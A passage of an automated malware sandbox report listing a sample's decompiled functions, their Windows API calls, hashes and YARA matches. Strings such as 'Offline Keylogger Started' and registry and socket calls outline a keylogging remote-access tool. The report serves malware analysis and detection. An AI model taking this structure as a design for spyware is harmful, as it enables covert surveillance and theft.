                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 2152742572-0
                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                          Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                          • _free.LIBCMT ref: 004482D3
                                                          • _free.LIBCMT ref: 004482FA
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                          • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                          • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                          • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                          Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: !D@$NG
                                                          • API String ID: 180926312-2721294649
                                                          • Opcode ID: 7b2d32faab2f25bb6acd68ad7c722f439bb1c3c7822d7aa4cd440718151b9180
                                                          • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                          • Opcode Fuzzy Hash: 7b2d32faab2f25bb6acd68ad7c722f439bb1c3c7822d7aa4cd440718151b9180
                                                          • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                          Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                          • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                          • Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                          • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                          Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                          • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                          • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                          • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                          • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                          Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2579639479-0
                                                          • Opcode ID: 028699b46d8dcb15adfbe87a9e01acdc95aa5578d040106dea6d7dbf46413c9a
                                                          • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                          • Opcode Fuzzy Hash: 028699b46d8dcb15adfbe87a9e01acdc95aa5578d040106dea6d7dbf46413c9a
                                                          • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                          Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                          • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                          • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                          • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                          Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                          • GetLastError.KERNEL32 ref: 0040D083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: SG
                                                          • API String ID: 1925916568-3189917014
                                                          • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                          • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                          • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                          • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                          Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitsend
                                                          • String ID:
                                                          • API String ID: 3963590051-0
                                                          • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                          • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                          • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                          • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                          Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                          • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                          • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                          • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                          • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                          Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                          • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                          • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                          Function 0044F3DD Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                          • _free.LIBCMT ref: 0044F41A
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnvironmentStrings$Free_free
                                                          • String ID:
                                                          • API String ID: 2716640707-0
                                                          • Opcode ID: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                                                          • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                                          • Opcode Fuzzy Hash: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                                                          • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                                          Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                          • RegCloseKey.KERNEL32(?), ref: 00413592
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                          • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                          • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                          Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                                          • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                          Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                          • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID:
                                                          • API String ID: 1818849710-0
                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                          Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                          • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitrecv
                                                          • String ID:
                                                          • API String ID: 311754179-0
                                                          • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                          • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                                          • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                          • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                                          Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: pQG
                                                          • API String ID: 176396367-3769108836
                                                          • Opcode ID: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                          • Opcode Fuzzy Hash: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                          Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                          Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID:
                                                          • API String ID: 1953588214-0
                                                          • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                          • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                          Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
